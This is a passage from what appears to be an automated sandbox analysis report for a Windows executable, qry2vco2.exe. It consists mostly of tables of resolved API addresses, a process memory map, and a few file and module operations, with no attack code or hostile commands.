| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:07 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #216: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #216 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:33, Reason: Child Process |
| Unmonitor | End Time: 00:03:37, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb3c |
| Parent PID | 0x764 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FD0
0x
C1C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00310000 | 0x003cdfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x003d0000 | 0x003f9fff | Memory Mapped File | r |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x00747fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00900fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x01d0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01eaffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
